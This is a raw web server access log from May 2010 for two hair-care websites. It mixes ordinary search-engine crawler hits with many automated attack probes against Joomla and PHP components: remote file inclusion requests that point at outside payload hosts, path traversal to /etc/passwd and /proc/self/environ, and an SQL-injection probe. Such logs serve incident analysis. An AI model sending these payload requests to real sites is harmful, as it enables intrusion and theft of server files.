91.121.77.13 - - [03/May/2010:18:41:17 -0700] "GET /index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.77.13 - - [03/May/2010:18:41:17 -0700] "GET /logs//index.php?option=com_fabrik&controller=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:43 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:43 -0700] "GET /logs/access_100329.log//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:43 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:44 -0700] "GET /logs/access_100329.log//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:44 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:44 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:56 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:56 -0700] "GET /logs/access_100329.log%20%20//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:56 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:57 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:57 -0700] "GET /logs/access_100329.log%20%20//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:45:57 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:04 -0700] "GET /logs/access_100329.log//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:04 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:04 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:10 -0700] "GET /index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:10 -0700] "GET /logs/access_100329.log//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [03/May/2010:18:46:10 -0700] "GET /logs//index.php?req_path=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:47:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14996 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.222.56.62 - - [03/May/2010:18:48:35 -0700] "GET /include/bbs.lib.inc.php?site_path=http://ttrr.interfree.it/%0Did.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.212.226.210 - - [03/May/2010:18:52:53 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "freehairsecrets.com"
91.212.226.210 - - [03/May/2010:18:52:53 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "freehairsecrets.com"
220.181.7.103 - - [03/May/2010:18:52:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13423 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
209.62.121.162 - - [03/May/2010:18:53:21 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:18:53:22 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:18:56:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13333 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:18:56:17 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13538 HTTP/1.0" 200 333 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
202.72.242.242 - - [03/May/2010:19:00:12 -0700] "GET /logs/access.log///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
202.72.242.242 - - [03/May/2010:19:00:12 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
202.72.242.242 - - [03/May/2010:19:00:13 -0700] "GET /logs///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
222.122.52.80 - - [03/May/2010:19:03:59 -0700] "GET /errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:03:59 -0700] "GET /logs/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:03:59 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:04:04 -0700] "GET /logs/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:04:04 -0700] "GET /errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:04:11 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:05:35 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3327 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
91.201.66.81 - - [03/May/2010:19:08:23 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "growlonghairfast.com"
91.201.66.81 - - [03/May/2010:19:08:24 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00" "growlonghairfast.com"
124.115.6.16 - - [03/May/2010:19:09:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "freehairsecrets.com"
222.122.52.80 - - [03/May/2010:19:14:47 -0700] "GET /logs/access_100426.log/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.122.52.80 - - [03/May/2010:19:15:42 -0700] "GET /logs/access_100426.log/errors.php?error=http://e-jacob.co.kr/data/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:15:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14129 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
204.15.190.163 - - [03/May/2010:19:16:19 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [03/May/2010:19:16:19 -0700] "GET /logs/access.log%20%20///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
204.15.190.163 - - [03/May/2010:19:16:19 -0700] "GET /logs///index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
222.236.47.182 - - [03/May/2010:19:18:53 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:18:53 -0700] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:18:53 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:19:38 -0700] "GET /logs/access.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:19:38 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:19:38 -0700] "GET /logs/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:21:07 -0700] "GET /logs/access.log HTTP/1.1" 200 485051 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:21:49 -0700] "GET /logs/access_100125.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.236.47.182 - - [03/May/2010:19:21:54 -0700] "GET /logs/access_100125.log/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:26:17 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.80.108.70 - - [03/May/2010:19:32:12 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:19:33:22 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
209.62.121.162 - - [03/May/2010:19:33:30 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:19:33:30 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:19:33:58 -0700] "GET /index.php?option=com_mambots&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
211.239.161.143 - - [03/May/2010:19:34:27 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.239.161.143 - - [03/May/2010:19:35:56 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
77.88.25.28 - - [03/May/2010:19:37:32 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4966 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.88.4.141 - - [03/May/2010:19:37:42 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:37:49 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:38:02 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:40:13 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [03/May/2010:19:40:21 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
121.88.4.141 - - [03/May/2010:19:40:27 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.freehairsecrets.com"
208.82.117.228 - - [03/May/2010:19:46:19 -0700] "GET /logs/access_100125.log/index.php?option=com_mambots&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:19:46:19 -0700] "GET /index.php?option=com_mambots&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:19:46:19 -0700] "GET /logs/index.php?option=com_mambots&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:47:59 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:19:49:42 -0700] "GET /logs/access_091221.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.7.15 - - [03/May/2010:19:53:00 -0700] "GET / HTTP/1.1" 200 926 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
208.82.117.228 - - [03/May/2010:19:58:16 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:19:58:23 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
121.88.4.141 - - [03/May/2010:19:58:33 -0700] "GET /logs/access_100426.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:34 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:35 -0700] "GET /logs//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:45 -0700] "GET /logs/access_100426.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:45 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:46 -0700] "GET /logs//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:48 -0700] "GET /logs/access_100426.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:48 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:58:49 -0700] "GET /logs//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:59:41 -0700] "GET /logs/access_100412.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:59:52 -0700] "GET /logs/access_100412.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
121.88.4.141 - - [03/May/2010:19:59:58 -0700] "GET /logs/access_100412.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:20:00:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4976 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
119.235.237.85 - - [03/May/2010:20:05:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12211 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "growlonghairfast.com"
208.82.117.228 - - [03/May/2010:20:06:26 -0700] "GET /logs/access.log/index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [03/May/2010:20:06:26 -0700] "GET /index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
208.82.117.228 - - [03/May/2010:20:06:26 -0700] "GET /logs/index.php?option=com_jreactions&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.freehairsecrets.com"
119.235.237.85 - - [03/May/2010:20:08:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18916 HTTP/1.1" 200 349 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.freehairsecrets.com"
67.195.114.22 - - [03/May/2010:20:08:51 -0700] "GET /tmp/mailError.log HTTP/1.0" 200 62167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
209.62.121.162 - - [03/May/2010:20:10:21 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
209.62.121.162 - - [03/May/2010:20:10:21 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://gonapus.net/chat2/2?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:20:12:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14102 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.112.151 - - [03/May/2010:20:13:47 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [03/May/2010:20:13:48 -0700] "GET /logs/access_091109.log HTTP/1.0" 200 589584 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:20:13:57 -0700] "GET /logs/access_091012.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:20:15:21 -0700] "GET /logs/access_100426.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:20:15:22 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:20:15:23 -0700] "GET /logs//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.239.161.143 - - [03/May/2010:20:21:29 -0700] "GET /logs/access_100426.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.239.161.143 - - [03/May/2010:20:21:30 -0700] "GET /admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
211.239.161.143 - - [03/May/2010:20:21:31 -0700] "GET /logs//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
220.80.108.70 - - [03/May/2010:20:22:59 -0700] "GET /logs/access_100412.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [03/May/2010:20:23:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3889 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.239.161.143 - - [03/May/2010:20:30:24 -0700] "GET /logs/access_100412.log//admin/components/com_flyspray/startdown.php?file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
204.236.252.212 - - [03/May/2010:20:30:58 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
204.236.252.212 - - [03/May/2010:20:31:00 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1194 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
